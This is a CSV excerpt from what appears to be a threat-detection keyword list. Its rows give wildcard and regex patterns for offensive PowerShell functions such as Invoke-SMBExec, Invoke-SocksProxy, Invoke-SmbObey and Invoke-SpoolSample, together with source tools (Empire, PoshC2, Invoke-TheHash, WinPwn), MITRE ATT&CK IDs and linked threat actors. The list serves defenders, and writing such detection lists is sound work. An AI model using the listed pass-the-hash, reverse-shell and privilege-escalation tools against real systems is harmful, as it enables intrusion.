"*Invoke-SMBClient*",".{0,1000}Invoke\-SMBClient.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49651"
"*Invoke-SMBClient.ps1*",".{0,1000}Invoke\-SMBClient\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49652"
"*Invoke-SMBEnum*",".{0,1000}Invoke\-SMBEnum.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49653"
"*Invoke-SMBEnum*",".{0,1000}Invoke\-SMBEnum.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49654"
"*invoke-smbexec *",".{0,1000}invoke\-smbexec\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49655"
"*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","APT20","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49656"
"*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49657"
"*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49658"
"*Invoke-SMBExec.ps1*",".{0,1000}Invoke\-SMBExec\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","APT20","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49659"
"*Invoke-SMBExec.ps1*",".{0,1000}Invoke\-SMBExec\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49660"
"*invoke-smblogin *",".{0,1000}invoke\-smblogin\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49661"
"*Invoke-SMBLogin.ps1*",".{0,1000}Invoke\-SMBLogin\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49662"
"*Invoke-SMBNegotiate -ComputerName localhost*",".{0,1000}Invoke\-SMBNegotiate\s\-ComputerName\slocalhost.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49663"
"*Invoke-SMBNegotiate*",".{0,1000}Invoke\-SMBNegotiate.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49664"
"*Invoke-SmbObey *",".{0,1000}Invoke\-SmbObey\s.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","49665"
"*Invoke-SmbObey.*",".{0,1000}Invoke\-SmbObey\..{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","49666"
"*Invoke-SmbOrder *",".{0,1000}Invoke\-SmbOrder\s.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","49667"
"*Invoke-SmbOrder.*",".{0,1000}Invoke\-SmbOrder\..{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","49668"
"*Invoke-SMBRemoting*",".{0,1000}Invoke\-SMBRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49669"
"*Invoke-SMBRemoting.ps1*",".{0,1000}Invoke\-SMBRemoting\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49670"
"*Invoke-SMBRemoting.ps1*",".{0,1000}Invoke\-SMBRemoting\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","49671"
"*Invoke-SMBRemoting-main*",".{0,1000}Invoke\-SMBRemoting\-main.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","49672"
"*Invoke-SMBScanner*",".{0,1000}Invoke\-SMBScanner.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SmbScanner.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49673"
"*Invoke-SmbScanner*",".{0,1000}Invoke\-SmbScanner.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SmbScanner.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49674"
"*Invoke-SmbScanner.ps1*",".{0,1000}Invoke\-SmbScanner\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49675"
"*Invoke-Snaffler*",".{0,1000}Invoke\-Snaffler.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49676"
"*Invoke-Snaffler*",".{0,1000}Invoke\-Snaffler.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49677"
"*invoke-sniffer *",".{0,1000}invoke\-sniffer\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49678"
"*Invoke-SocksProxy *",".{0,1000}Invoke\-SocksProxy\s.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","49679"
"*Invoke-SocksProxy*",".{0,1000}Invoke\-SocksProxy.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49680"
"*Invoke-SocksProxy.ps1*",".{0,1000}Invoke\-SocksProxy\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","49681"
"*Invoke-SocksProxy.psm1*",".{0,1000}Invoke\-SocksProxy\.psm1.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","49682"
"*Invoke-SpawnAs*",".{0,1000}Invoke\-SpawnAs.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49683"
"*Invoke-SpoolFool*",".{0,1000}Invoke\-SpoolFool.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","1","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","49684"
"*Invoke-Spoolsample*",".{0,1000}Invoke\-Spoolsample.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49685"
"*Invoke-SpoolSample*",".{0,1000}Invoke\-SpoolSample.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49686"
"*Invoke-SpoolSample.ps1*",".{0,1000}Invoke\-SpoolSample\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49687"
